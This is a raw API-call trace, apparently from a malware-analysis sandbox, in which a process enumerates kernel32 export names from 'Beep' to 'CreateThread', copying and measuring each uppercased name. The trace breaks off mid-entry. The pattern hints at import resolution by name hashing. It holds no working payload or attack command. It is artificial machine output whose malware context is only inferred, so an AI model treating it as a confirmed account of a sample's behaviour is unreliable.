lstrlenA (lpString="BEEP") returned 4 [0081.972] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0081.972] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0081.972] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0081.972] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0081.972] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0081.972] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0081.972] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0081.972] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0081.973] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0081.973] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0081.973] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0081.973] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0081.973] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0081.973] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0081.973] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0081.973] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0081.973] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0081.973] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0081.973] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0081.973] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0081.973] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0081.973] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0081.973] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0081.973] lstrlenA (lpString="CANCELIO") returned 8 [0081.973] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0081.973] lstrlenA (lpString="CANCELIOEX") returned 10 [0081.973] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0081.973] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0081.973] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0081.973] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0081.973] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0081.973] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0081.973] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0081.973] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0081.973] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0081.973] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0081.973] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0081.973] lstrlenA (lpString="CHECKELEVATION") returned 14 [0081.973] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0081.973] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0081.973] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0081.973] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0081.973] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0081.973] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0081.973] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0081.974] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0081.974] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0081.974] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0081.974] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0081.974] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0081.974] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0081.974] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0081.974] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0081.974] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0081.974] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0081.974] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0081.974] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0081.974] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0081.974] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0081.974] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0081.974] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0081.974] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0081.974] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0081.974] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0081.974] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0081.974] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0081.974] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0081.974] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0081.974] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0081.974] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0081.974] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0081.976] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0081.976] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0081.976] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0081.976] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0081.976] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0081.976] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0081.976] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0081.976] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0081.976] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0081.976] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0081.976] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0081.976] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0081.976] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0081.976] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0081.976] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0081.976] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0081.976] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0081.976] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0081.977] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0081.977] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0081.977] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0081.977] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0081.977] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0081.977] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0081.977] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0081.977] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0081.977] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0081.977] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0081.977] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0081.977] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0081.977] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0081.977] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0081.977] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0081.977] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0081.977] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0081.977] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0081.977] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0081.977] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0081.977] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0081.977] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0081.977] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0081.977] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0081.977] lstrlenA (lpString="COPYCONTEXT") returned 11 [0081.977] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0081.977] lstrlenA (lpString="COPYFILEA") returned 9 [0081.977] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0081.977] lstrlenA (lpString="COPYFILEEXA") returned 11 [0081.977] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0081.977] lstrlenA (lpString="COPYFILEEXW") returned 11 [0081.977] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0081.977] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0081.977] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0081.977] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0081.977] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0081.977] lstrlenA (lpString="COPYFILEW") returned 9 [0081.978] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0081.978] lstrlenA (lpString="COPYLZFILE") returned 10 [0081.978] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0081.978] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0081.978] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0081.978] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0081.978] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0081.978] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0081.978] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0081.978] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0081.978] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0081.978] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0081.978] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0081.978] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0081.978] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0081.978] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0081.978] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0081.978] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0081.978] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0081.978] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0081.978] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0081.978] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0081.978] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0081.978] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0081.978] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0081.978] lstrlenA (lpString="CREATEEVENTA") returned 12 [0081.978] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0081.978] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0081.978] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0081.978] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0081.978] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0081.978] lstrlenA (lpString="CREATEEVENTW") returned 12 [0081.978] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0081.978] lstrlenA (lpString="CREATEFIBER") returned 11 [0081.978] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0081.978] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0081.978] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0081.979] lstrlenA (lpString="CREATEFILEA") returned 11 [0081.979] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0081.979] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0081.979] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0081.979] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0081.979] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0081.979] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0081.979] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0081.979] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0081.979] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0081.979] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0081.979] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0081.979] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0081.979] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0081.979] lstrlenA (lpString="CREATEFILEW") returned 11 [0081.979] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0081.979] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0081.979] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0081.979] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0081.979] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0081.979] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0081.979] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0081.979] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0081.979] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0081.979] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0081.979] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0081.979] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0081.979] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0081.979] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0081.979] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0081.979] lstrlenA (lpString="CREATEJOBSET") returned 12 [0081.979] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0081.979] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0081.979] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0081.979] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0081.979] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0081.979] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0081.979] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0081.980] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0081.980] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0081.980] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0081.980] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0081.980] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0081.980] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0081.980] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0081.980] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0081.980] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0081.980] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0081.980] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0081.980] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0081.980] lstrlenA (lpString="CREATEPIPE") returned 10 [0081.980] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0081.980] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0081.980] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0081.980] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0081.980] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0081.980] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0081.980] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0081.980] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0081.980] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0081.980] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0081.980] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0081.980] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0081.980] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0081.980] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0081.980] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0081.980] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0081.980] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0081.980] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0081.980] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0081.980] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0081.980] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0081.980] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0081.980] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0081.980] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0081.981] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0081.981] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0081.981] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0081.981] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0081.981] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0081.981] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0081.981] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0081.981] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0081.981] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0081.981] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0081.981] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0081.981] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0081.981] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0081.981] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0081.981] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0081.981] lstrlenA (lpString="CREATETHREAD") returned 12 [0081.981] lstrcpyA (in: lpString1=0x3f2c7fc, 